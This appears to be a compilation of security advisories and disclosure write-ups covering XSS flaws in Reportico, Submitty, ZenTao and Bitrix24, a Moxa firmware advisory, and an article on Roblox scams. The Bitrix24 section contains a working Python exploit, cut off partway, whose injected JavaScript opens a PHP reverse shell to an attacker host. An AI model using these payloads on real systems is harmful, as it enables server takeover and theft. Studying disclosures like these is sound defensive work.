Reportico 7.1.21 is vulnerable to Cross Site Scripting (XSS).

Cross-site scripting (XSS) is a web application vulnerability that permits an attacker to inject code, (typically HTML or JavaScript), into the contents of an outside website. When a victim views an infected page on the website, the injected code executes in the victim’s browser. Consequently, the attacker has bypassed the browser’s same origin policy and is able to steal private information from a victim associated with the website.

Steps:

1.  Login into the Reportico-7.1 admin module
2.  Under create report in project, enter the XSS payload in title section.
3.  The payload will execute once it's saved.

CVE-2023-46925: Reflected XSS in Reportico-7.1 · Issue #47 · reportico-web/reportico

A vulnerability has been identified in PT-G503 Series firmware versions prior to v5.2, where the Secure attribute for sensitive cookies in HTTPS sessions is not set, which could cause the cookie to be transmitted in plaintext over an HTTP session. The vulnerability may lead to security risks, potentially exposing user session data to unauthorized access and manipulation.



As of June 15, 2022, this site no longer supports Internet Explorer. Please use another browser for the best experience on our site.

**Please sign in**

**SUMMARY**

**PT-G503 Series Multiple Vulnerabilities**

*   Security Advisory ID: MPSA-230203
*   Version: V1.0
*   Release Date: Nov 02, 2023
*   Reference:
    

PT-G503 Series firmware version v5.2 and prior are affected by multiple vulnerabilities in the old version of jQuery, weak cipher suites, and unsecure web cookies. Using the older jQuery version and weak cipher suites and not setting session cookie attributes properly caused these vulnerabilities. These vulnerabilities could put your security at risk in many ways, such as Cross-site Scripting (XSS) attacks, prototype pollution, data leaks, unauthorized access to user sessions, etc. 

  
The identified vulnerability types and potential impacts are shown below:

Item

Vulnerability Type

Impact

1

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79) 

CVE-2015-9251, CVE-2020-11022, CVE-2020-11023 (jQuery) 

An attacker located remotely can insert HTML or JavaScript into the system via a web interface. 

2

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') (CWE-1321) 

CVE-2019-11358 (jQuery) 

An attacker can inject attributes that are used in other components. 

3

Inadequate Encryption Strength (CWE-326) 

CVE-2005-4900 (cipher) 

An attacker may be able to decrypt the data using spoofing attacks. 

4

Sensitive Cookie Without 'HttpOnly' Flag (CWE-1004) 

CVE-2023-4217 (Cookie) 

This vulnerability could cause security risks and allow unauthorized access to user session data. 

5

Sensitive Cookie in HTTPS Session Without 'Secure' Attribute (CWE-614) 

CVE-2023-5035 (Cookie) 

This vulnerability could cause the cookie to be transmitted in plaintext over an HTTP session. 

**Vulnerability Scoring Details**

ID

CVSS V3.1

VECTOR

REMOTE EXPLOIT WITHOUT AUTH?

CVE-2005-4900 

5.9 

AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 

Yes

CVE-2015-9251 

6.1 

AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 

Yes

CVE-2019-11358 

6.1 

AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 

Yes

CVE-2020-11022 

6.9 

AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N 

Yes

CVE-2020-11023 

6.9 

AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N 

Yes

CVE-2023-4217 

3.1 

AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N 

Yes

CVE-2023-5035 

3.1 

AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N 

Yes

**AFFECTED PRODUCTS AND SOLUTIONS**

**Affected Products:**

The affected products and firmware versions are shown below.

Product Series

Affected Versions

PT-G503 Series 

Firmware version 5.2 and prior. 

**Solutions:**

For CVE-2005-4900, CVE-2015-9251, CVE-2019-11358, CVE-2020-11022, and CVE-2020-11023, Moxa has developed appropriate solutions to address the vulnerabilities by updating the jQuery version and removing weak cipher suites. The solutions for affected products are shown below. 

****Mitigation****

The risk levels of CVE-2023-4217 and CVE-2023-5035 are low, and it’s hard to forbidden HTTP connections because HTTP is still required in certain legacy application scenarios. To mitigate these vulnerabilities, users should carefully use HTTP if necessary, and could try to replace HTTP by HTTPS when using the web service. Additionally, refer to the following mitigation measures to deploy the product in an appropriate product security context. 

Moxa recommends users follow CISA recommendations.  

*   Reduce network exposure by ensuring that all control system devices and systems are not accessible from the Internet. 
    
*   Place control system networks and remote devices behind firewalls, isolating them from business networks. 
    
*   When remote access is necessary, employ secure methods such as Virtual Private Networks (VPNs). It is important to note that VPNs may have vulnerabilities and should be kept up to date with the latest available version. Remember that the security of a VPN depends on the security of its connected devices. 
    

**Revision History:**

VERSION

DESCRIPTION

RELEASE DATE

1.0

First Release

Nov 2, 2023 

**Relevant Products**

PT-G503 Series ·

*     Print this page
    
*   You can manage and share your saved list in My Moxa
    

**Let’s get that fixed**

If you are concerned about a potential cybersecurity vulnerability, please contact us and one of technical support staff will get in touch with you.

Report a Vulnerability

CVE-2023-5035: PT-G503 Series Multiple Vulnerabilities

A Stored Cross-Site Scripting vulnerability was discovered in ZenTao 18.3 where a user can create a project, and in the name field of the project, they can inject malicious JavaScript code.

English | 中文

    

**Introduction**

ZenTao is the first opensource project management software in China. It’s a comprehensive, all-in-one platform that covers the main PM process, from product and project management to quality management, documentation management, organization management, and office management.

Since its establishment in 2009, ZenTao has helped tens of thousands of teams and organizations improve their project management structures. Currently, ZenTao is being used by some of the largest companies in the world, ranging from those in the sectors of finance and telecoms to manufacturing and software development. They trust ZenTao for streamlining their processes, simplifying communication between clients and employees, increasing transparency, and improving productivity and efficiency.

**Design Philosophy**

The name ZenTao came from combining two Chinese characters, Zen(禅) and Tao(道), which have rich inspirations pertaining to culture and history. With its name referring to highly respected aspects of life, it’s only logical to convey their meaning in management by providing transparency, orderliness, and accessibility.

ZenTao management concept is built on the 3 popular management methodologies: Scrum, Waterfall, and Kanban:

*   The Scrum model built-in ZenTao is adaptable and flexible, which perfectly matches the rapid iterations of software development projects.
*   The Waterfall model built-in ZenTao lays emphasis on stages division and strict process control, which is ideal for projects that are well defined in advance and with fewer changes.
*   The Kanban model built-in ZenTao pays more attention to value flow and visualization, which is suitable for the team with a transparent process and efficient transmission of information.

ZenTao clearly defines the concepts of product, project, and QA to help the product owners, developers, and testers coordinate with each other while maintaining separate functionalities. Through stories, tasks, and bugs, the whole teams interact and track issues and improvements to ensure the delivery of quality products.

Besides, with ZenTao's feature-rich modules including data visualization, measurement, DevOps, Doc asset management, and automated testing, ZenTao offers flexible solutions to cover the entire process of software development, allows organizations to work efficiently and productivity, and helps them better control time, cost, and quality.

**Official Website**

*   Website
*   Manual
*   FAQ
*   Extension

**Demo**

*   ZenTao Opensource
*   ZenTao Biz
*   ZenTao Max

**Security Vulnerabilities**

If you find any vulnerability in ZenTao system please feel free to contact us at chunsheng@easycorp.ltd. We do appreciate your time and effort.

**License**

ZenTao is an opensource project management software licensed on AGPL and ZPL.

**Enhanced version**

ZenTao Biz, ZenTao Max, and ZenTao Cloud are available for you if ZenTao Opensource can not meet your feature requirement.

> Learn more about the comparison between ZenTao Opensource, ZenTao Biz, and ZenTao Max.

**ZenTao Biz**

ZenTao Biz has more powerful functions based on the ZenTao Open Source. It also expands horizontally based on the project management process and covers more roles.

On the one hand, ZenTao Biz provides more complete services for enterprises and its enhanced functions are more suitable for the internal process management of the companies.

On the other hand, ZenTao Biz has more added functions such as operation and maintenance management, OA office management, feedback management, as well as document version management, and online preview. It can support the customer's related work more effectively outside the development process, and provide more comprehensive support for the project management process.

**ZenTao Max**

ZenTao Max, the most advanced ZenTao version, allows users to easily monitor and track the entire process of project management. It also helps improve the robustness and maturity of enterprises to greatly increase the probability of project success.

The features such as process control, process definition, project measurement, issue management, risk management, quality assurance, and project reporting are strong enhanced in ZenTao Max. It's also supported the implementation of CMMI standards, help enterprises pass CMMI assessment.

**ZenTao Cloud**

> Learn more about ZenTao Cloud.

ZenTao Cloud provides a flexible solution for users who prefer the SaaS service and running businesses anywhere and anytime. It's easy to use and super convenient in that it only needs one click to activate an account. Besides, ZenTao Cloud requires no maintenance and will keep updating automatically. With HTTPS agreement, your data will keep safe and no worry about information disclosure. Even better, data on ZenTao Cloud will backup automatically and users can download the backup file at any time.

CVE-2023-46475: GitHub - easysoft/zentaopms: Zentao is an agile(scrum) project management system/tool, Free Upgrade Forever!​

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-46475: CVE-Disclosures/ZentaoPMS/CVE-2023-46475/CVE-2023-46475 - Cross-Site Scripting (Stored).md at main · elementalSec/CVE-Disclosures

Submitty before v22.06.00 is vulnerable to Cross Site Scripting (XSS). An attacker can create a malicious link in the forum that leads to XSS.

**Introduction**

Submitty before v22.06.00 is vulnerable to Cross Site Scripting (XSS). An attacker can create a malicious link in the forum that leads to XSS.

**CVSS Score****Score**

*   **CVSS v3.1:** 6.5
*   **Vector:** AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

**Impact**

*   **Confidentiality:** The attacker can read any data within the victim's context.
*   **Integrity:** The attacker can utilize the victim's privilege to perform actions as that user.
*   **Availability:** If the victim is an administrator, the attcker can prevent the service from running.

**Likelihood**

*   **Skill Required:** This attack requires basic knowledge of XSS and Markdown.
*   **Conditions:** The attcker must be able to send a malicious link to the forum, and the victim must click the link to trigger the attack.
*   **Discoverability:** This vulnerability is easy to find.

**Problem Details****Overview**

This report identifies a Cross-Site Scripting (XSS) vulnerability within Submitty, specifically within the Markdown rendering functionality of the forum component. The vulnerability arises due to inadequate sanitization of user input in Markdown links. An attacker can exploit this flaw by crafting a malicious Markdown link that contains embedded JavaScript code.

Markdown, being a lightweight markup language, is widely used for formatting text on the web. Submitty uses Markdown for various user-generated content areas. However, the current implementation does not properly escape JavaScript URLs (javascript:) within the links. As a result, when a Markdown link containing JavaScript is rendered, the script gets executed instead of being treated as a regular hyperlink.

This type of XSS vulnerability is particularly concerning because:

*   It allows an attacker to execute arbitrary JavaScript code in the context of the user's browser session.
*   It can lead to a range of malicious activities, including session hijacking, personal data theft, and delivery of malware.
*   It affects all users viewing the rendered Markdown content, making it a significant threat to the user base.

**Affected Area**

The forum component of Submitty.

**Root Cause**

The vulnerability originates from the use of the CommonMarkConverter library in the application for rendering Markdown content. While CommonMarkConverter is a robust and popular choice for converting Markdown to HTML, its security relies heavily on proper configuration.

The primary cause of this XSS vulnerability is a misconfiguration in the CommonMarkConverter usage. Specifically, the allow_unsafe_links option was not explicitly set to false. This configuration flag controls whether the parser permits javascript: URLs, which are inherently dangerous as they can be used to execute JavaScript code directly in the browser. By default, CommonMarkConverter is designed to allow all links, including javascript: URLs, considering some use cases might require such functionality. However, this default behavior poses a significant security risk in environments where user-generated content is parsed and rendered.

**Steps to Reproduce**

Following steps are required to reproduce the issue.

1.  Access to the forum component of Submitty (any version before v22.06.00).
2.  Create a new post, use Markdown and put [XSS](javascript:alert('XSS')) as payload.
3.  Submit the new post.
4.  Click the link XSS, then notice that the script javascript:alert('XSS') has been executed.

When using the CommonMarkConverter library, the allow_unsafe_links option should be explicitly set to false.

**References**

The vulnerability has been fixed as a part of pull request 8032.

_Report prepared by: Fu Chai_ _Date: 10/31/2023_

CVE-2023-43193: CVE-2023-43193: Submitty Cross-Site Scripting (XSS) Vulnerability Report

Knowing the common scams is an important step in using the platform safely. The following recommendations help players not fall into scams.

Thursday, November 2, 2023 07:11

*   Online video games often make use of in-game virtual currency and give players the ability to purchase, trade or sell items. While these features are often selling points for players and potential revenue streams for the companies that make them, they also inevitably draw bad actors and scams.
*   One of these games is “Roblox,” a highly popular gaming platform, especially among children. We curated a short list of scams that have been reported online, such as on user support forums, YouTube videos and scammer Discord channels, explaining how they work and providing advice on how to detect and avoid them.

Roblox is a gaming platform composed of “Experiences,” which is “Roblox’s” name for user-created 3-D worlds where players can interact with each other and their surroundings. The creator, which can be any user, builds the scenarios, the game logic, items and overall interactivity of the experience.

Roblox is free to play but contains an in-application currency called “Robux” that can be used to purchase clothes, weapons or other items for a user’s avatar, some of which exist in limited quantities and can be worth tens of thousands of real-world dollars. Items can also be traded for other items or Robux using a built-in trading system. This creates a potentially profitable market and even though trading for real money is prohibited by the terms of service, some users negotiate outside the platform and trade using real money.

Where there is a potential for profit there are also people trying to scam others. “Roblox” users can be targeted by scammers (known as “beamers” by “Roblox” players) who attempt to steal valuable items or Robux from other players. This can sometimes be made easier for the scammers because of “Roblox's” young user base. Nearly half of the game’s 65 million users are under the age of 13 who may not be as adept at spotting scams.

**How to identify scams**

Having knowledge of common scams and how they work is key to spotting them, even if you’ve never heard of a particular tactic before. The following are some of the most common scams that have been seen targetting “Roblox” users.

**Offering free Robux/phishing** 

The scammer sends a message using “Roblox’s” in-game chat or another messaging application, to the victim offering a way to earn free Robux. In the most common variation of this scam, the user receives a link to a web page containing “Roblox”-related themes or images. The site offers the victim free Robux and asks the victim to enter their username and password so that they can receive the Robux in their account. After inserting their username and password, instead of receiving the Robux, the scammer logs into the victim’s account and steals all Robux and valuable items.

**In-experience phishing** 

In Roblox, any user can create experiences, including scammers. In this case, the scammer creates a malicious experience that promises to deliver free Robux and prompts the victim to fill out a form with their username and password. The victim’s credentials are sent to an actor-controlled server, allowing the adversary to log in to the user’s account and steal all Robux and valuable items.

__source: https://roblox.fandom.com/wiki/Scam/Gallery?file=Reward\_scam.jpg__

**JavaScript method** 

The scammer asks the victims to copy and paste a link containing JavaScript code into the browser’s address bar. There are many variations that use this method. In one common variation, the scammer pretends to be developing an experience and asks the user to use their avatar image in the experience. To receive the details of the avatar automatically, the scammer asks the victim to copy and paste the link containing the JavaScript code into the browser’s address bar. That code then steals the victim’s session ID, allowing the scammer to use the platform to log in to the victim's account and transfer all items and Robux from the victim's account to the scammer’s account. 

**Bookmark method** 

The bookmark method is a variant of the JavaScript method. Instead of asking the victim to paste a link into the address bar, the victim is asked to drag and drop the bookmark into the bookmarks bar and then click on it. The bookmark contains JavaScript code that steals the victim’s session ID. 

source: https://www.reddit.com/r/robloxhackers/comments/11eofbr/possibly\_new\_roblox\_scam/

**API method** 

The scammer proposes a trade that is usually too good to be true to the victim. Then, the attacker says that before continuing with the trade, they would like to check if the victim’s items have not been stolen. To do this, they say, the victim must visit a special page in Roblox and insert an ID. They then give the victim the URL for a page that is actually part of the Roblox domain and contains the following form, among other things.

This page is part of the Roblox API documentation and is used by developers to test the API. While talking with the victim, the scammer creates a trade request that, if accepted, would transfer all the victim’s items to the scammer. The scammer then sends this ID to the victim and instructs him to insert the ID in the form and click “Try it out.” This will cause the user to accept a trade with the specified ID and transfer all their items and Robux to the scammer.

**HAR file method** 

The scammer offers to create a free GFX (a 3-D, realistic version of the victim’s avatar) under the pretext that they are learning to do this and could use the practice. If the victim accepts, the scammer says they need a file to complete the development and gives the victim a tutorial or video explaining how to obtain the file. The tutorial requests that the victim open their browser developer tools and save the network request as a HAR file, as shown below.

Once saved, the victim is instructed to send it to the scammer. This file contains the session ID of the victim, which allows the scammer to use the platform logged into the victim’s account and steal all items and Robux.

**Double trade** 

The scammer approaches the victim proposing two trades. One trade is good for the scammer and one is good for the victim. The victim comes out with a clear advantage from this trade. The scammer puts the condition that the victim either accepts both trades or rejects both trades. However, while they chat, the scammer removes some Robux from their account, making the trade that favors the victim fail for lack of Robux in the attacker's account. When the victim accepts both trades, only the bad trade goes through, making it a bad deal for the victim.

**Malware installation** 

This method is as simple as requesting the victim to install some software or a browser extension as a way to receive free Robux or to help the scammer perform some development that is of interest to the victim. The installed software is malware, designed to steal the victim’s session ID, which allows the scammer to use the platform logged in to the victim’s account and steal all items and Robux.

**5 ways to avoid being scammed**

Knowing the common scams is an important step in using the platform safely. The following recommendations help players not fall into scams:

*   **If it seems too good to be true, it is:** This is probably the most important recommendation. If a stranger or a website is claiming to offer free currency or free items, it is almost certainly a scam.
*   **Don't open links or download files sent by unknown sources:** These links can be phishing or malware delivery lures. If you don't know the other player, it’s generally a good idea to not open the link.
*   **Be suspicious of requests to perform unusual actions**: Some scams rely on the user performing more or less technical actions. These are a good indicator that it may be a scam. For example:
    *   Copy-pasting into the browser address bar.
    *   Creating and clicking in bookmarks.
    *   Opening browser developer tools.
*   **Be suspicious of unusual trades**: When trading some attention to some red flags, such as:
    *   Trades that are conducted outside the platform.
    *   Trades where the trader creates unusual rules such as double trades.
    *   Requests to perform actions on the web browser during a trade negotiation, such as using the API form.
*   **Use the platform’s built-in security features**: Roblox takes security seriously and provides security guides and several features to increase security. For example:
    *   Enable multi-factor authentication.
    *   Configure account privacy.
    *   Configure who, if anyone, can trade with the player.
    *   Configure the trade quality filter to help avoid suspicious trades.
    *   Enable a mandatory PIN to change settings.
    *   Exploring and using these can help better protect minors. The following links contain additional information and guidance:

https://corporate.roblox.com/parents/ 

https://en.help.roblox.com/hc/en-us/articles/203313380-Keep-Your-Account-Safe

Attackers use JavaScript URLs, API forms and more to scam users in popular online game “Roblox”


A logic error when using mb_strpos() to check for potential XSS payload in Bitrix24 22.0.300 allows attackers to bypass XSS sanitisation via placing HTML tags at the begining of the payload.







**Summary:**

**Product**

Bitrix24

**Vendor**

Bitrix24

**Severity**

Critical

**Affected Versions**

Bitrix24 22.0.300 (latest version as of writing)

**Tested Versions**

Bitrix24 22.0.300 (latest version as of writing)

**CVE Identifier**

CVE-2023-1715 & CVE-2023-1716

**CVE Description**

_(CVE-2023-1715)_: A logic error when using mb\_strpos() to check for potential XSS payload in Bitrix24 22.0.300 allows attackers to bypass XSS sanitisation via placing HTML tags at the begining of the payload. _(CVE-2023-1716)_: Cross-site scripting (XSS) vulnerability in Invoice Edit Page in Bitrix24 22.0.300 allows attackers to execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege.

**CWE Classification(s)**

CWE-83 Improper Neutralization of Script in Attributes in a Web Page

**CAPEC Classification(s)**

CAPEC-592 Stored XSS

**CVSS3.1 Scoring System:**

**Base Score:** 9.0 (Critical) **Vector String:** CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

Low

**User Interaction (UI)**

Required

**Scope (S)**

Changed

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Vulnerability Details:**

This report presents information on a Cross Site Scripting (XSS) vulnerability in Bitrix24’s Invoice Edit page that allows an attacker to run arbitrary JavaScript code on the browser of any victim that visits the affected page. If the victim has administrator permissions, an attacker may leverage the built-in “PHP Command Line” feature to execute arbitrary system commands on the target web server.

Authorized users may edit an invoice they have access to via the crm.invoice.edit component, located at bitrix/components/bitrix/crm.invoice.edit/component.php and accessible via a post request to https://TARGET_HOST/bitrix/urlrewrite.php?SEF_APPLICATION_CUR_PAGE_URL=/crm/invoice/edit/INVOICE_ID/.

One of the fields that can be supplied by an attacker is the USER_DESCRIPTION field. As this field is rendered as HTML by a rich text editor in the frontend, sanitization is performed on this field to prevent XSS:

    // bitrix/components/bitrix/crm.invoice.edit/component.php lines 746 to 763
    
    $userDescription = trim($_POST['USER_DESCRIPTION']);
    $bSanitizeUserDescription = ($userDescription !== '' && mb_strpos($userDescription, '<')); // [1]
    if($bSanitizeComments || $bSanitizeUserDescription)
    {
        $sanitizer = new CBXSanitizer();
        $sanitizer->ApplyDoubleEncode(false);
        $sanitizer->SetLevel(CBXSanitizer::SECURE_LEVEL_MIDDLE);
        //Crutch for for Chrome line break behaviour in HTML editor.
        $sanitizer->AddTags(array('div' => array()));
        $sanitizer->AddTags(array('a' => array('href', 'title', 'name', 'style', 'alt', 'target')));
        $sanitizer->AddTags(array('p' => array()));
        $sanitizer->AddTags(array('span' => array('style')));
        if ($bSanitizeComments)
            $comments = $sanitizer->SanitizeHtml($comments);
        if ($bSanitizeUserDescription)
            $userDescription = $sanitizer->SanitizeHtml($userDescription);
        unset($sanitizer);
    }
    

The mb_strpos($userDescription, '<') check ([1]) is supposed to check if the user description contains the < character, which could indicate that this field contains HTML tags and thus requires sanitization. However, if the < character is the first character, mb_strpos($userDescription, '<') would be 0, resulting in $bSanitizeUserDescription being false. Thus, sanitization of this field can be completely bypassed.

The $userDescription field is subsequently saved to the database, along with the rest of the invoice data.

However, the built-in Bitrix XSS sanitizer, applied to the body parameters of every request, complicates exploitation of this vulnerability.

The XSS sanitizer uses several regular expressions (regex) to identify and sanitize potentially dangerous input. One of these aims to target HTML event handlers, which could lead to XSS. The regex used can be found in bitrix/modules/security/lib/filter/auditor/xss.php on line 173, and a simplified version is shown below:

    /(on[a-z]*)([a-z]{3}[\s]*=)/is
    

The regex aims to identify patterns such as onerror= and uses two capturing groups to split the dangerous string into two parts. A space is then added between the two parts, neutralizing the event handler. For example, onerror= would be transformed into oner ror=. Note that the regex allows any amount of whitespace between the event handler name (eg onerror) and the equals sign (=). This is compliant with the HTML specification. On its own, this sanitizer is secure.

When an authorized user navigates to the invoice edit page, the stored invoice is retrieved. The user description field is then passed to the CLightHTMLEditor class as the content to be edited.

The configuration for this editor, including the content, is injected into the JavaScript context after sanitization by the CUtil::PhpToJSObject function.

    <script>
    // ...
    // bitrix/modules/fileman/classes/general/light_editor.php line 254
    top.<?=$this->jsObjName?> = window.<?=$this->jsObjName?> = new window.JCLightHTMLEditor(<?=CUtil::PhpToJSObject($this->JSConfig)?>);
    // ...
    </script>
    

The CUtil::PhpToJSObject function calls the CUtil::JSEscape function (shown below) on the value of each key-value pair in the $this->JSConfig array.

    // bitrix/modules/main/tools.php lines 4349 to 4355
    
    public static function JSEscape($s){
        static $aSearch = array("\xe2\x80\xa9", "\\", "'", "\"", "\r\n", "\r", "\n", "\xe2\x80\xa8", "*/", "</");
        static $aReplace = array(" ", "\\\\", "\\'", '\\"', "\n", "\n", "\\n", "\\n", "*\\/", "<\\/");
        $val = str_replace($aSearch, $aReplace, $s);
        return $val;
    }
    

This function performs a simple string replacement on the input string $s to ensure that it does not contain any characters that may break out of a JavaScript string, such as ", ' or \.

Notably, this function replaces the byte string \xe2\x80\xa9 (U+2029 Unicode Paragraph Separator) with a regular space (U+0020 Space).

This is a significant transformation as the Bitrix XSS sanitizer does not regard the byte string \xe2\x80\xa9 as whitespace. Therefore, the string onerror\xe2\x80\xa9= would not be sanitized. However, CUtil::JSEscape would transform the string into onerror =, which is a valid HTML onerror event handler.

After sanitization and transformation by CUtil::JSEscape, the constructor of the JavaScript class JCLightHTMLEditor injects the content to be edited into HTML:

    // bitrix/js/fileman/light_editor/le_core.js lines 616 to 618
    
    this.pEditorDocument.open();
    this.pEditorDocument.write('<html><head></head><body>' + sContent + '</body></html>');
    this.pEditorDocument.close();
    

Therefore, a malicious attacker may create an invoice with user description <img src=x onerror\xe2\x80\xa9=alert(document.domain)>. As < is the first character in the string, sanitization in bitrix/components/bitrix/crm.invoice.edit/component.php is bypassed. Additionally, as onerror\xe2\x80\xa9= does not match the regex for an event handler, the built-in XSS sanitizer does not sanitize this string. Finally CUtil::JSEscape replaces \xe2\x80\xa9 with , resulting in <img src=x onerror =alert(document.domain)>. This string is then injected into HTML, resulting in XSS.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. This report includes a functional exploit written in Python3 that edits an existing invoice to inject malicious HTML in the user description field.

A sample exploit script is shown below:

    # Bitrix24 Invoice Edit Page XSS RCE (CVE-2023-XXXXX)
    # Via: https://TARGET_HOST/crm/invoice/edit/XXXX
    # Author: Lam Jun Rong (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import base64
    
    import requests
    import re
    import os
    import typing
    import subprocess
    import threading
    
    HOST = "http://localhost:8000"
    SITE_ID = "s1"
    USERNAME = "user"
    PASSWORD = "abcdef"
    
    TARGET_INVOICE_ID = 3
    
    LPORT = 9001
    LHOST = "192.168.86.43"
    
    PROXY = {"http": "http://localhost:8080"}
    
    
    def nested_to_urlencoded(val: typing.Any, prefix="") -> dict:
        out = dict()
        if type(val) is dict:
            for k, v in val.items():
                child = nested_to_urlencoded(v, prefix=(k if prefix == "" else f"[{k}]"))
                for key, val in child.items():
                    out[prefix + key] = val
        elif type(val) in [list, tuple]:
            for i, item in enumerate(val):
                child = nested_to_urlencoded(item, prefix=f"[{i}]")
                for key, val in child.items():
                    out[prefix + key] = val
        else:
            out[prefix] = val
        return out
    
    
    def dict_to_str(d):
        return "&".join(f"{k}={v}" for k, v in d.items())
    
    
    def check_creds(cookie, sessid):
        return requests.get(HOST + "/bitrix/tools/public_session.php", headers={
            "X-Bitrix-Csrf-Token": sessid
        }, cookies={
            "PHPSESSID": cookie,
        }, proxies=PROXY).text == "OK"
    
    
    def login(session, username, password):
        if os.path.isfile("./cached-creds.txt"):
            cookie, sessid = open("./cached-creds.txt").read().split(":")
            if check_creds(cookie, sessid):
                session.cookies.set("PHPSESSID", cookie)
                print("[+] Using cached credentials")
                return sessid
            else:
                print("[!] Cached credentials are invalid")
        session.get(HOST + "/")
        resp = session.post(
            HOST + "/?login=yes",
            data={
                "AUTH_FORM": "Y",
                "TYPE": "AUTH",
                "backurl": "/",
                "USER_LOGIN": username,
                "USER_PASSWORD": password,
            },
        )
        if session.cookies.get("BITRIX_SM_LOGIN", "") == "":
            print(f"[!] Invalid credentials")
            exit()
        sessid = re.search(re.compile("'bitrix_sessid':'([a-f0-9]{32})'"), resp.text).group(
            1
        )
        print(f"[+] Logged in as {username}")
        with open("./cached-creds.txt", "w") as f:
            f.write(f"{session.cookies.get('PHPSESSID')}:{sessid}")
        return sessid
    
    
    def edit_invoice(session: requests.Session, sessid):
        payload = base64.b64encode("""
        fetch("/bitrix/admin/php_command_line.php?lang=en&"+window.parent.document.body.innerHTML.match(/sessid=[a-f0-9]{32}/)[0],{
            method:"POST",
            headers:{
              'Content-Type': 'application/x-www-form-urlencoded'
            },    
            body: new URLSearchParams({
                query: `$sock=fsockopen("LHOST",LPORT);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);`,
                ajax: "y",
                result_as_text:"N"
            })
        })
        """.replace("LHOST", LHOST).replace("LPORT", str(LPORT)).encode())
        session.post(
            HOST + f"/bitrix/urlrewrite.php?SEF_APPLICATION_CUR_PAGE_URL=%2Fcrm%2Finvoice%2Fedit%2F{TARGET_INVOICE_ID}%2F",
            headers={
                "Content-Type": "application/x-www-form-urlencoded",
            },
            data={
                "sessid": sessid,
                "CRM_INVOICE_EDIT_V12_active_tab": "tab_1",
                "ACCOUNT_NUMBER": TARGET_INVOICE_ID,
                "ORDER_TOPIC": "sss",
                "STATUS_ID": "N",
                "PAY_VOUCHER_DATE": "",
                "PAY_VOUCHER_NUM": "",
                "REASON_MARKED_SUCCESS": "",
                "DATE_MARKED": "",
                "REASON_MARKED": "",
                "PRIMARY_ENTITY_TYPE": "COMPANY",
                "PRIMARY_ENTITY_ID": "1",
                "SECONDARY_ENTITY_IDS": "7",
                "REQUISITE_ID": "0",
                "BANK_DETAIL_ID": "0",
                "PAY_SYSTEM_ID": "1",
                "UF_MYCOMPANY_ID": "0",
                "MC_REQUISITE_ID": "0",
                "MC_BANK_DETAIL_ID": "0",
                "RECUR_PARAM[PERIOD]": "1",
                "RECUR_PARAM[DAILY_INTERVAL_DAY]": "1",
                "RECUR_PARAM[DAILY_WORKDAY_ONLY]": "N",
                "RECUR_PARAM[WEEKLY_INTERVAL_WEEK]": "1",
                "RECUR_PARAM[WEEKLY_WEEK_DAYS][]": "1",
                "RECUR_PARAM[MONTHLY_TYPE]": "1",
                "RECUR_PARAM[MONTHLY_INTERVAL_DAY]": "1",
                "RECUR_PARAM[MONTHLY_WORKDAY_ONLY]": "N",
                "RECUR_PARAM[MONTHLY_MONTH_NUM_1]": "1",
                "RECUR_PARAM[MONTHLY_WEEKDAY_NUM]": "0",
                "RECUR_PARAM[MONTHLY_WEEK_DAY]": "1",
                "RECUR_PARAM[MONTHLY_MONTH_NUM_2]": "1",
                "RECUR_PARAM[YEARLY_TYPE]": "1",
                "RECUR_PARAM[YEARLY_INTERVAL_DAY]": "1",
                "RECUR_PARAM[YEARLY_WORKDAY_ONLY]": "N",
                "RECUR_PARAM[YEARLY_MONTH_NUM_1]": "1",
                "RECUR_PARAM[YEARLY_WEEK_DAY_NUM]": "0",
                "RECUR_PARAM[YEARLY_WEEK_DAY]": "1",
                "RECUR_PARAM[YEARLY_MONTH_NUM_2]": "1",
                "RECUR_PARAM[START_DATE]": "",
                "RECUR_PARAM[REPEAT_TILL]": "",
                "RECUR_PARAM[END_DATE]": "",
                "RECUR_PARAM[LIMIT_REPEAT]": "0",
                "RECUR_PARAM[DATE_PAY_BEFORE_TYPE]": "0",
                "RECUR_PARAM[DATE_PAY_BEFORE_COUNT]": "0",
                "RECUR_PARAM[DATE_PAY_BEFORE_PERIOD]": "1",
                "RECUR_PARAM[RECURRING_EMAIL_ID]": "22",
                "COMMENTS": "",
                "USER_DESCRIPTION": b"<img src=x onerror\xe2\x80\xa9=eval(atob('"+payload+b"'))>",
